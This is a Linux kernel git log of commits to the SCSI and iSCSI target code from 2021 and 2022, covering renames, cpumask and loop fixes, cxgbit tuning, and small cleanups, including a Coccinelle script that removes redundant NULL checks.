 "This consists of a small set of driver updates (lpfc, ufs, mpt3sas
  mpi3mr, iscsi target). Apart from that this is mostly small fixes with
  very few core changes (the biggest one being VPD caching)"

* tag 'scsi-misc' of git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi: (177 commits)
  scsi: target: tcmu: Avoid holding XArray lock when calling lock_page
  scsi: elx: efct: Remove NULL check after calling container_of()
  scsi: dpt_i2o: Drop redundant spinlock initialization
  scsi: qedf: Remove redundant variable op
  scsi: hisi_sas: Fix memory ordering in hisi_sas_task_deliver()
  scsi: fnic: Replace DMA mask of 64 bits with 47 bits
  scsi: mpi3mr: Add target device related sysfs attributes
  scsi: mpi3mr: Add shost related sysfs attributes
  scsi: elx: efct: Remove redundant memset() statement
  scsi: megaraid_sas: Remove redundant memset() statement
  scsi: mpi3mr: Return error if dma_alloc_coherent() fails
  scsi: hisi_sas: Fix rescan after deleting a disk
  scsi: hisi_sas: Use sas_ata_wait_after_reset() in IT nexus reset
  scsi: libsas: Refactor sas_ata_hard_reset()
  scsi: mpt3sas: Update driver version to 42.100.00.00
  scsi: mpt3sas: Fix junk chars displayed while printing ChipName
  scsi: ipr: Use kobj_to_dev()
  scsi: mpi3mr: Fix a NULL vs IS_ERR() bug in mpi3mr_bsg_init()
  scsi: bnx2fc: Avoid using get_cpu() in bnx2fc_cmd_alloc()
  scsi: libfc: Remove get_cpu() semantics in fc_exch_em_alloc()
  ...
2022-05-25 19:09:48 -07:00
Mingzhe Zou 525f447f88 scsi: target: Fix incorrect use of cpumask_t
In commit d72d827f2f, I used 'cpumask_t' incorrectly:

    void iscsit_thread_get_cpumask(struct iscsi_conn *conn)
    {
            int ord, cpu;
            cpumask_t conn_allowed_cpumask;
            ......
    }

    static ssize_t lio_target_wwn_cpus_allowed_list_store(
                   struct config_item *item, const char *page, size_t count)
    {
            int ret;
            char *orig;
            cpumask_t new_allowed_cpumask;
            ......
    }

The correct pattern should be as follows:

    cpumask_var_t mask;

    if (!zalloc_cpumask_var(&mask, GFP_KERNEL))
            return -ENOMEM;
    ... use 'mask' here ...
    free_cpumask_var(mask);

Link: https://lore.kernel.org/r/20220516054721.1548-1-mingzhe.zou@easystack.cn
Fixes: d72d827f2f ("scsi: target: Add iscsi/cpus_allowed_list in configfs")
Reported-by: Test Bot <zgrieee@gmail.com>
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Mingzhe Zou <mingzhe.zou@easystack.cn>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-05-17 21:42:23 -04:00
Max Gurtovoy 0873fe44e7 scsi: target: iscsi: Rename iscsi_session to iscsit_session
The structure iscsi_session naming is used by the iSCSI initiator
driver. Rename the target session to iscsit_session to have more readable
code.

Link: https://lore.kernel.org/r/20220428092939.36768-3-mgurtovoy@nvidia.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Max Gurtovoy <mgurtovoy@nvidia.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-05-10 22:32:21 -04:00
Max Gurtovoy be36d683fc scsi: target: iscsi: Rename iscsi_conn to iscsit_conn
The structure iscsi_conn naming is used by the iSCSI initiator
driver. Rename the target conn to iscsit_conn to have more readable code.

Link: https://lore.kernel.org/r/20220428092939.36768-2-mgurtovoy@nvidia.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Max Gurtovoy <mgurtovoy@nvidia.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-05-10 22:32:20 -04:00
Max Gurtovoy 66cd9d4ef7 scsi: target: iscsi: Rename iscsi_cmd to iscsit_cmd
The structure iscsi_cmd naming is used by the iSCSI initiator driver.
Rename the target cmd to iscsit_cmd to have more readable code.

Link: https://lore.kernel.org/r/20220428092939.36768-1-mgurtovoy@nvidia.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Max Gurtovoy <mgurtovoy@nvidia.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-05-10 22:32:20 -04:00
Mingzhe Zou d72d827f2f scsi: target: Add iscsi/cpus_allowed_list in configfs
The RX/TX threads for iSCSI connection can be scheduled to any online CPUs,
and will not be rescheduled.

When binding other heavy load threads along with iSCSI connection RX/TX
thread to the same CPU, the iSCSI performance will be worse.

Add iscsi/cpus_allowed_list in configfs. The available CPU set of iSCSI
connection RX/TX threads is allowed_cpus & online_cpus. If it is modified,
all RX/TX threads will be rescheduled.

Link: https://lore.kernel.org/r/20220301075500.14266-1-mingzhe.zou@easystack.cn
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Mingzhe Zou <mingzhe.zou@easystack.cn>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-03-14 23:40:36 -04:00
ZouMingzhe a861790afa scsi: target: iscsi: Make sure the np under each tpg is unique
iscsit_tpg_check_network_portal() has nested for_each loops and is supposed
to return true when a match is found. However, the tpg loop will still
continue after existing the tpg_np loop. If this tpg_np is not the last the
match value will be changed.

Break the outer loop after finding a match and make sure the np under each
tpg is unique.

Link: https://lore.kernel.org/r/20220111054742.19582-1-mingzhe.zou@easystack.cn
Signed-off-by: ZouMingzhe <mingzhe.zou@easystack.cn>
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-01-24 23:30:24 -05:00
Varun Prakash d1e51ea6bf scsi: target: cxgbit: Enable Delayed ACK
Enable Delayed ACK to reduce the number of TCP ACKs.

Link: https://lore.kernel.org/r/1634135109-5044-1-git-send-email-varun@chelsio.com
Signed-off-by: Varun Prakash <varun@chelsio.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2021-10-18 22:38:35 -04:00
Varun Prakash 7f96c7a67e scsi: target: cxgbit: Increase max DataSegmentLength
Current value of max DataSegmentLength is 8K. T5/T6 adapters support
DataSegmentLength upto 16K. Increase max DataSegmentLength.

Link: https://lore.kernel.org/r/1634135087-4996-1-git-send-email-varun@chelsio.com
Signed-off-by: Varun Prakash <varun@chelsio.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2021-10-18 22:38:35 -04:00
Dmitry Bogdanov 382731ec01 scsi: target: iscsi: Replace tpg enable attr with ops.enable
Remove tpg/enable attribute. Add fabric ops enable_tpg implementation
instead.

Link: https://lore.kernel.org/r/20210910084133.17956-3-d.bogdanov@yadro.com
Reviewed-by: Roman Bolshakov <r.bolshakov@yadro.com>
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Dmitry Bogdanov <d.bogdanov@yadro.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2021-10-04 23:27:38 -04:00
Colin Ian King 8f13142ac2 scsi: target: Remove redundant assignment to variable ret
The variable ret is being initialized with a value that is never read, the
assignment is redundant and can be removed.

Link: https://lore.kernel.org/r/20210721101519.42299-1-colin.king@canonical.com
Signed-off-by: Colin Ian King <colin.king@canonical.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Addresses-Coverity: ("Unused value")
2021-07-27 00:06:42 -04:00
Colin Ian King 79366f0a8d scsi: target: iscsi: Remove redundant continue statement
The continue statement at the end of a loop has no effect, remove it.

Link: https://lore.kernel.org/r/20210617114347.10247-1-colin.king@canonical.com
Signed-off-by: Colin Ian King <colin.king@canonical.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Addresses-Coverity: ("Continue has no effect")
2021-06-18 23:01:03 -04:00
Guenter Roeck 998da772fd scsi: target: iscsi: Drop unnecessary container_of()
The structure pointer passed to container_of() is never NULL; that was
already checked. That means that the result of container_of() operations
on it is also never NULL, even though se_node_acl is the first element
of the structure embedding it. On top of that, it is misleading to perform
a NULL check on the result of container_of() because the position of the
contained element could change, which would make the test invalid.
Remove the unnecessary NULL check.

As it turns out, the container_of operation was only made for the purpose
of the NULL check. If the container_of is actually needed, it is repeated
later. Remove the container_of operation as well.

The NULL check was identified and removed with the following Coccinelle
script.

@@
type t;
identifier v;
statement s;
@@

<+...
(
  t v = container_of(...);
|
  v = container_of(...);
)
  ...
  when != v
- if (\( !v \| v == NULL \) ) s
...+>

Link: https://lore.kernel.org/r/20210510040817.2050266-1-linux@roeck-us.net
Cc: "Martin K. Petersen" <martin.petersen@oracle.com>
Cc: Hou Pu <houpu@bytedance.com>
Cc: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2021-05-14 22:40:45 -04:00
Varun Prakash 6ecdafaec7 scsi: target: cxgbit: Unmap DMA buffer before calling target_execute_cmd()
Instead of calling dma_unmap_sg() after completing WRITE I/O, call
dma_unmap_sg() before calling target_execute_cmd() to sync the DMA buffer.

Link: https://lore.kernel.org/r/1618403949-3443-1-git-send-email-varun@chelsio.com
Cc: <stable@vger.kernel.org> # 5.4+
Signed-off-by: Varun Prakash <varun@chelsio.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2021-05-14 22:28:17 -04:00
Yang Yingliang 6235bef6f9 scsi: target: iscsi: Switch to kmemdup_nul()
Use kmemdup_nul() helper instead of open-coding to simplify the code.

Link: https://lore.kernel.org/r/20210402092517.2445595-1-yangyingliang@huawei.com
Reported-by: Hulk Robot <hulkci@huawei.com>
Signed-off-by: Yang Yingliang <yangyingliang@huawei.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2021-05-10 13:24:03 -04:00
Martin K. Petersen 84b20b8062 Merge branch '5.12/scsi-fixes' into 5.13/scsi-staging
Resolve a couple of conflicts between the 5.12 fixes branch and the
5.13 staging tree (iSCSI target and UFS).

Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2021-04-12 21:41:54 -04:00
Roman Bolshakov 0352c3d395 scsi: target: iscsi: Fix zero tag inside a trace event
target_sequencer_start event is triggered inside target_cmd_init_cdb().
se_cmd.tag is not initialized with ITT at the moment so the event always
prints zero tag.

Link: https://lore.kernel.org/r/20210403215415.95077-1-r.bolshakov@yadro.com
Cc: stable@vger.kernel.org # 5.10+
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Roman Bolshakov <r.bolshakov@yadro.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2021-04-05 23:09:37 -04:00
Chaitanya Kulkarni c22659fbb9 scsi: target: iscsi: Initialize arrays at declaration time
Avoids calling memset().

Link: https://lore.kernel.org/r/20210228055645.22253-13-chaitanya.kulkarni@wdc.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Reviewed-by: Johannes Thumshirn <johannes.thumshirn@wdc.com>
Signed-off-by: Chaitanya Kulkarni <chaitanya.kulkarni@wdc.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2021-03-09 23:47:18 -05:00